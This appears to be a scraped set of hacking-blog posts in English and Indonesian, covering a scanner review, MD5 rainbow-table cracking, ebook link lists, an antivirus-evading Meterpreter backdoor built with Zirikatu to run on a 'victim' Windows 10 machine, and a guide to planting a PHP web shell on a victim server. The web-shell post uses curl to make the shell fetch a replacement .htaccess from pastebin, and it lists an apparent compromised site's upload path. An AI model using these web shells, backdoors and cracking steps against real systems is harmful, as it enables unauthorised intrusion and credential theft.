Maxteroit: Pentest

Redhawk Powerful Information Gathering Tools and Vulnerability Scanning

 

Redhawk, Powerful Information Gathering and Vulnerability Scanning Tools

Ok, in this post, i would like to review powerful tools for Information Gathering and Vulnerability Scanning, its tool called RedHawk , ok let's try it.

#Installing

1. I will use Git Clone methods from GitHub;
use this command :
git clone https://github.com/Tuhinshubhra/RED_HAWK.git
2. Next, enter the directory by command cd .

3. Look at this picture :


there is no permission for executing that file, so we must change mod for the file, use this command :
chmod +x rhawk.php

#Running

1. Command :
php rhawk.php

2.  Ok, after you run this tool, for the first time, you must enter a website domain, for example, i use my domain website www.maxteroit.com :


3. Choose HTTP or HTTPS of that website :


4. And then, Menu tools will be printed :


Ok I will try 1 Scanner, i choose Blogger View Scanner, and the result is :


Just that tutorials from me, and if you find an error in the script, you can ask me in the comment, or mail me [email protected]
Thank's

Redhawk Powerful Information Gathering and Vulnerability Scanning Tools

Crack / Decrypt MD5 Hashes using Rainbow Table

Crack / Decrypt MD5 Hashes using Rainbow Table

Crack / Decrypt MD5 Hashes using Rainbow Table

Hello everyone, in this tutorial, i would like to give method how to crack, encrypt MD5 hashes using rainbow table.

What is Rainbow Table ?

rainbow table is a precomputed table for reversing cryptographic hash functions, usually for cracking password hashes. Tables are usually used in recovering a password (or credit card numbers, etc.) up to a certain length consisting of a limited set of characters. It is a practical example of a space–time tradeoff, using less computer processing time and more storage than a brute-force attack which calculates a hash on every attempt, but more processing time and less storage than a simple lookup table with one entry per hash. Use of a key derivation function that employs a salt makes this attack infeasible.
source : Wikipedia

so.. we can conclude what is rainbow table by this image :


Confused ? yha haha same with me, lol.
Alright, you will understand after watching this video :


Let's start

OK, after you read the explanation, watch that video... so it's time to try it.

If you use Windows, choose for Windows,
If you use Linux, choose for windows, hahah i mean Linux
In this tutorial, im using Rainbow Crack for Linux.

2. After Downloaded, unzip the Rainbow and go to that directory, see :


Crack / Decrypt MD5 Hashes using Rainbow Table


Not allow for execute the script ? type this command :
chmod +x rcrack rtgen rtsort

Now we have access to execute that script/program.
Waitt..... before running rtcrack script like that videos, you must have Rainbow Table first :).

Creating Rainbow Tables

Alright, before your create Rainbow Tables, you should see charset.txt, like this one :


Understand it ? must !
numeric                    = [0123456789]
alpha                        = [ABCDEFGHIJKLMNOPQRSTUVWXYZ]
alpha-numeric          = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789]
loweralpha                = [abcdefghijklmnopqrstuvwxyz]
loweralpha-numeric = [abcdefghijklmnopqrstuvwxyz0123456789]
mixalpha                  = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ]
mixalpha-numeric    = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789]
ascii-32-95                  = [ !"#$%&'()*+,-./0123456789:;<=>[email protected][\]^_`abcdefghijklmnopqrstuvwxyz{|}~]
ascii-32-65-123-4            = [ !"#$%&'()*+,-./0123456789:;<=>[email protected][\]^_`{|}~]
alpha-numeric-symbol32-space = [[email protected]#$%^&*()-_+=~`[]{}|\:;"'<>,.?/ ]
If you are lazy to create Rainbow table (it can take your times and make your computer hot)
you can download from my repository :

https://github.com/maxteroit/RainbowTable-alpha

or clone from my repository, use this command :
git clone https://github.com/maxteroit/RainbowTable-alpha.git 
 After cloning my repo, move all file (exc Readme.md) to directory which you save the Rainbowcrack files.

How to create Rainbow Table ?

Start creating Rainbow Table, use this command :
In here, im creating alpha charset for my rainbow table...
./rtgen md5 alpha 1 7 0 2100 8000000 all
The command means having the md5 hash type , plaintext length range 1 - 7, plaintext total 8353082582.

On process..


You can change plaintext range, plaintext total :).
If it done, you must short the rainbow table first, like this :
./rtsort .


 Ok, after that, run ./rcrack like the video, but wait, provide the md5 hash, or you can use my md5 :
ea1a3df96ef7de460929eecb5c521bad
Let's check in hashkiller.co.uk that my md5 hash :)
and the result is :

Not Found :p

Let's crack with our Rainbow Table and Rainbow Crack :D

Start cracking / decrypting MD5

Use this command :
./rcrack . -h ea1a3df96ef7de460929eecb5c521bad

Andd the result is.... CRACKEDDDD DECRYPTEDDD



Crack / Decrypt MD5 Hashes using Rainbow Table

Kumpulan Ebook Hacking, Programming, Networking, Blogging & Security Part 2




Kumpulan Ebook Hacking, Programming, Networking, Blogging & Security Part 2 akhirnya saya post :D dan yang pasti masih berhubungan dengan judul yang saya cantumkan diatas yha :D.

Link Kumpulan Ebook Hacking, Programming, Networking, Blogging & Security Part 2 :


https://www.maxteroit.com/2018/07/kumpulan-ebook-hacking-programming-networking-blogging-security.html

Seperti biasa, pemanis....

(Google Haking For Penetration Testing - 529 Pages)



(Metasploit Penetration Testing Cookbook - 269 Pages)



Oke berikut list Ebook Koleksi babang Maxteroit Part 2 :


2.Ebook Google Secrets - How To Get A Top 10 Ranking - 112 Pages

3.Ebook Gray Hat Hacking - 721 Pages

4.Ebook Metasploit The Penetration Testers Guide - 332 Pages

5.Ebook Nmap 6_ Network Exploration and Security Auditing Cookbook - 318 Pages

6.Ebook Nmap Essentials - 118 Pages

7.Ebook nmap-cookbook-the-fat-free-guide-to-network-scanning - 198 Pages

8.Ebook Penetration Testing with the Bash shell - 151 Pages

9.Ebook PHP for Absolute Beginners, 2nd Edition - 236 Pages

10.Ebook Practical Malware Analysis - 802 Pages

11.Ebook Practical Reverse Engineering - 383 Pages

12.Ebook The Art of Memory Forensics - 914 Pages

13.Ebook Windows Sysinternals Administrators Reference - 497 Pages

14.Ebook windows-command-line-administration - 578 Pages

Nah Mungkin baru segitu dulu saja koleksi Ebook saya yang bisa share dipost ini..
Dan di post selanjutnya, saya akan share Ebook mengenai Ethical Hacking
Jangan sungkan untuk bertanya atau meminta sesuatu pada saya :D , sobat bisa hubungi saya ke email === > [email protected]
Terima Kasih  

Kumpulan Ebook Hacking, Programming, Networking, Blogging & Security 2

Kumpulan Ebook Hacking, Programming, Networking, Blogging & Security Part 1



Kumpulan Ebook Hacking, Programming, Networking, Blogging & Security Part 1 - Ebook mengenai Hacking, Programming, Networking & Security sudah bertebaran di Internet, yap seperti di Blog Ini :D Maxteroit tercinta. Berhubungan banyak yang request mengenai Upload Ebook-ebook yang saya punya :'D  (permintaan dari teman FB) , dengan begitu saya dengan senang hati share koleksi-koleksi ebook yang saya punya, berikut screenshotnya :

(GrayHat Hacking-721 pages)


(Practical Reverse Engineering-383 pages)


Nah itu baru secuil aj :D, 
Berikut Nama sekaligus Linknya :














Itulah Kumpulan Ebook Hacking, Programming, Networking, Blogging & Security Part 1 ,
Penasaran dengan 2 Sampel diatas bukan ? 
tunggu di update-an selanjutnya yha, jgn lupa subscribe, atau jika ingin minta langsung, bisa hubungi saya via email =====> [email protected]

Untuk Kumpulan Ebook Hacking, Programming, Networking, Blogging & Security 1, segitu dulu yha :'p
thx

Kumpulan Ebook Hacking, Programming, Networking, Blogging & Security 1

Hack Windows 10 (Bypass Antivirus) Using Zirikatu (FUD)


Jika sebelumnya saya bahas hack windows  dengan msfvenom biasa (tanpa bantuan apapun, tapi kali ini saya akan share tutorial bagaimana Hack Windows 10 (Bypass Antivirus) Using Zirikatu (FUD).

Baca Juga :
Cara Membuat Backdoor Fud Menggunakan Veil-Evasion
Hack Windows Beda Jaringan Menggunakan Metasploit 

Oke langsung saja ke tutorial utamanya, cekidot.....

Download terlebih dahulu zirikatunya di github, bisa clone, bisa juga didownload langsung (dalam format zip) di link berikut
https://github.com/pasahitz/zirikatu

Jika sudah didownload, silahkan ekstrak file zirikatunya tadi, lalu buka folder yg sudah diekstrak menggunakan terminal, seperti berikut.....


Lalu jalankan tool Zirikatunya :


Disana terdapat beberapa pilihan, bisa kalian coba-coba sendiri, disini saya memilih pilihan yang nomor 3, yaitu Meterpreter_Reverse_https

Selanjutnya :
Set LHOST-nya, karena disini hanya jangkauan lokal, kita gunakan ip lokal kita, bisa dilihat dengan menggunakan perintah
ifconfig

Lalu set LPORT kita, kalian bisa set bebas berapapun angkanya, (karna lokal).
Untuk langkah  selanjutnya, bisa menyesuaikan....


Nah disana ada pertanyaan blablabla, kita yes kan saja, agar langsung masuk ke msfconsole dan si Zirikatunya sendiri sudah men-set sesuai dengan payload yang sudah kita buat, kita hanya tinggal menjalankan backdoornya di OS korban :D

Ok kita jalankan backdoornya..

(Sebelum Backdoor dieksekusi)

(Sesudah Dieksekusi).

Untuk lebih jelasnya, bisa disimak langsung lewat video berikut :

link =====> https://www.youtube.com/watch?v=i8cInI46fRQ



Ok sekian saja tutor saya :D ,
ouh iyha, untuk yang beda jaringan-nya akan menyusul, masih banyak tugas kuliah xixixixi.

Hack Windows 10 (Bypass Antivirus) Using Zirikatu (FUD)


Akses Shell, Bukan Download! - Shell Backdoor dalam computer security system ,merujuk kepada mekanisme yang dapat digunakan untuk mengakses sistem, aplikasi, atau jaringan, selain dari mekanisme yang umum digunakan (melalui proses logon atau proses autentikasi lainnya).

Salah satu cara mananamkan shell backdoor pada server adalah dengan metode  JQuery File Upload, tapi pernahkah kalian melakukan cara ini namun saat meng-akses shell, shell backdoor kalian malah ter-download? Oke, kita bahas solusinya.


  • .htaccess
Salah satu penyebab shell malah ter-download adalah htaccess. Apa itu htaccess? .htaccess adalah file untuk merubah beberapa konfigurasi untuk mengarahkan pada web server Apache.

AddType application/octet-stream .php

Lalu bagaimana solusinya? Solusinya adalah me-replace htaccess server dengan htaccess kita sendiri.

Bagaimana caranya??

  • 1. Siapkan file .php berisi script berikut,
<?php passthru($_POST['cmd']); __halt_compiler(); ?>
  • 2. Upload ke server korban.
  • 3. Buka termninal, ketikkan perintah,
curl -d cmd="wget https://pastebin.com/raw/ttPzvDjQ -O .htaccess" urlshell
contoh:
curl -d cmd="wget https://pastebin.com/raw/ttPzvDjQ -O .htaccess" http://maxteroit.com/shell.php


  • 4. Upload shell dengan format .berandal > contoh: shell.berandal
Contoh hasil upload:  
https://www.hicinko.com/cruisecms/public/uploadcontent/server/php/files//kecil.berandal

Penutup,
Semua artikel yang dimuat Maxteroit, hanya untuk pembelajaran saja, penggunaan untuk melanggar hukum diluar tanggung jawab Maxteroit. Jika ada kurang jelas atau ada yang ditanyakan, tinggal kan di kolom komentar.

Terima Kasih,
Berandal. 

Akses Shell, Bukan Download!

Subscribe Our Newsletter